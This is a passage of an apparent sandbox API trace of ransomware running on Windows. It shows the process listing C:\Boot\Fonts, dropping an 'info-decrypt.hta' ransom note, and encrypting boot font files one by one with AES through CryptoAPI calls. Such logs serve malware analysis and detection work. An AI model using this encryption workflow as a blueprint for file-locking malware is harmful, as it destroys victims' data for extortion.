ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0153.219] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.219] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0153.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0153.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0153.219] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0153.219] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0153.220] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.220] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.220] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0153.220] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0153.220] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0153.220] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0153.221] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0153.221] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0153.221] FindClose (in: hFindFile=0xbe15e8 | out: hFindFile=0xbe15e8) returned 1 [0153.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0153.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0153.221] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\chs_boot.ttf", lpFilePart=0x0) returned 0x1a [0153.221] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0153.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0153.221] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta" (normalized: "c:\\boot\\fonts\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0153.222] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\chs_boot.ttf", lpFilePart=0x0) returned 0x1a [0153.222] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0153.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0153.222] CreateFileW (lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta" (normalized: "c:\\boot\\fonts\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324 [0153.333] GetFileType (hFile=0x324) returned 0x1 [0153.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0153.333] GetFileType (hFile=0x324) returned 0x1 [0153.333] WriteFile (in: hFile=0x324, lpBuffer=0x3720654*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x3720654*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0153.334] WriteFile (in: hFile=0x324, lpBuffer=0x3720654*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x3720654*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0153.335] CloseHandle (hObject=0x324) returned 1 [0153.335] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\chs_boot.ttf", lpFilePart=0x0) returned 0x1a [0153.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0153.335] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x3721670 | out: lpFileInformation=0x3721670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00)) returned 1 [0153.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0153.335] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\chs_boot.ttf", lpFilePart=0x0) returned 0x1a [0153.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0153.336] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0153.336] GetFileType (hFile=0x324) returned 0x1 [0153.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0153.336] GetFileType (hFile=0x324) returned 0x1 [0153.336] GetFileSize (in: hFile=0x324, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x385e00 [0153.336] ReadFile (in: hFile=0x324, lpBuffer=0x7dc0cf0, nNumberOfBytesToRead=0x385e00, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x7dc0cf0*, lpNumberOfBytesRead=0x6a7f1bc*=0x385e00, lpOverlapped=0x0) returned 1 [0154.944] CloseHandle (hObject=0x324) returned 1 [0154.944] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbe0030) returned 1 [0154.989] CryptGenRandom (in: hProv=0xbe0030, dwLen=0x10, pbBuffer=0x39754b0 | out: pbBuffer=0x39754b0) returned 1 [0157.178] CryptImportKey (in: hProv=0xbe0030, pbData=0x3755b2c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xbe15a8) returned 1 [0157.178] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0157.178] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0157.178] CryptDuplicateKey (in: hKey=0xbe15a8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xbe14e8) returned 1 [0157.178] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0157.178] CryptSetKeyParam (hKey=0xbe14e8, dwParam=0x4, pbData=0x3755c0c*=0x1, dwFlags=0x0) returned 1 [0157.178] CryptSetKeyParam (hKey=0xbe14e8, dwParam=0x1, pbData=0x3755bd8, dwFlags=0x0) returned 1 [0157.394] CryptEncrypt (in: hKey=0xbe14e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x83a9f30*, pdwDataLen=0x6a7f188*=0x385e10, dwBufLen=0x385e10 | out: pbData=0x83a9f30*, pdwDataLen=0x6a7f188*=0x385e10) returned 1 [0157.598] CryptEncrypt (in: hKey=0xbe14e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3755c34*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3755c34*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0157.599] CryptDestroyKey (hKey=0xbe15a8) returned 1 [0157.599] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0157.599] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0157.599] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\chs_boot.ttf", lpFilePart=0x0) returned 0x1a [0157.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0157.599] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0157.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0157.601] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\cht_boot.ttf", lpFilePart=0x0) returned 0x1a [0157.601] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0157.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0157.601] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta" (normalized: "c:\\boot\\fonts\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x190121e0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x190121e0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x19142ce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0157.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0157.602] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\cht_boot.ttf", lpFilePart=0x0) returned 0x1a [0157.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0157.602] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x3846f1c | out: lpFileInformation=0x3846f1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4)) returned 1 [0157.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0157.713] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\cht_boot.ttf", lpFilePart=0x0) returned 0x1a [0157.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0157.714] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0157.714] GetFileType (hFile=0x428) returned 0x1 [0157.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0157.714] GetFileType (hFile=0x428) returned 0x1 [0157.714] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x3b27a4 [0157.714] ReadFile (in: hFile=0x428, lpBuffer=0x87b47c8, nNumberOfBytesToRead=0x3b27a4, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x87b47c8*, lpNumberOfBytesRead=0x6a7f1bc*=0x3b27a4, lpOverlapped=0x0) returned 1 [0158.382] CloseHandle (hObject=0x428) returned 1 [0158.382] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbe0030) returned 1 [0158.383] CryptGenRandom (in: hProv=0xbe0030, dwLen=0x10, pbBuffer=0x378cabc | out: pbBuffer=0x378cabc) returned 1 [0159.857] CryptImportKey (in: hProv=0xbe0030, pbData=0x36b4084, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f050) returned 1 [0159.857] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.857] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.857] CryptDuplicateKey (in: hKey=0xb7f050, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f290) returned 1 [0159.857] CryptContextAddRef (hProv=0xbe0030, pdwReserved=0x0, dwFlags=0x0) returned 1 [0159.857] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x4, pbData=0x36b4164*=0x1, dwFlags=0x0) returned 1 [0159.857] CryptSetKeyParam (hKey=0xb7f290, dwParam=0x1, pbData=0x36b4130, dwFlags=0x0) returned 1 [0160.096] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xa734128*, pdwDataLen=0x6a7f188*=0x3b27b0, dwBufLen=0x3b27b0 | out: pbData=0xa734128*, pdwDataLen=0x6a7f188*=0x3b27b0) returned 1 [0160.672] CryptEncrypt (in: hKey=0xb7f290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36b418c*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x36b418c*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0160.674] CryptDestroyKey (hKey=0xb7f050) returned 1 [0160.674] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0160.674] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0160.674] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\cht_boot.ttf", lpFilePart=0x0) returned 0x1a [0160.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0160.674] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0160.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0160.676] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\jpn_boot.ttf", lpFilePart=0x0) returned 0x1a [0160.676] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0160.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0160.676] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta" (normalized: "c:\\boot\\fonts\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x190121e0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x190121e0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x19142ce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0160.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0160.676] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\jpn_boot.ttf", lpFilePart=0x0) returned 0x1a [0160.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0160.676] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x36b4d8c | out: lpFileInformation=0x36b4d8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4)) returned 1 [0160.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0160.677] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\jpn_boot.ttf", lpFilePart=0x0) returned 0x1a [0160.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0160.677] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0160.677] GetFileType (hFile=0x2f0) returned 0x1 [0160.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0160.677] GetFileType (hFile=0x2f0) returned 0x1 [0160.677] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x1e46e4 [0160.677] ReadFile (in: hFile=0x2f0, lpBuffer=0xaae68f8, nNumberOfBytesToRead=0x1e46e4, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0xaae68f8*, lpNumberOfBytesRead=0x6a7f1bc*=0x1e46e4, lpOverlapped=0x0) returned 1 [0161.491] CloseHandle (hObject=0x2f0) returned 1 [0161.491] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xb1dda0) returned 1 [0161.492] CryptGenRandom (in: hProv=0xb1dda0, dwLen=0x10, pbBuffer=0x374459c | out: pbBuffer=0x374459c) returned 1 [0162.619] CryptImportKey (in: hProv=0xb1dda0, pbData=0x39ec218, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f610) returned 1 [0162.619] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.619] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.619] CryptDuplicateKey (in: hKey=0xb7f610, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7fa10) returned 1 [0162.620] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0162.620] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x4, pbData=0x39ec2f8*=0x1, dwFlags=0x0) returned 1 [0162.620] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x1, pbData=0x39ec2c4, dwFlags=0x0) returned 1 [0162.632] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xaccaff8*, pdwDataLen=0x6a7f188*=0x1e46f0, dwBufLen=0x1e46f0 | out: pbData=0xaccaff8*, pdwDataLen=0x6a7f188*=0x1e46f0) returned 1 [0163.610] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36c7a4c*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x36c7a4c*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0163.612] CryptDestroyKey (hKey=0xb7f610) returned 1 [0163.612] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0163.612] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0163.612] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\jpn_boot.ttf", lpFilePart=0x0) returned 0x1a [0163.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0163.612] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: 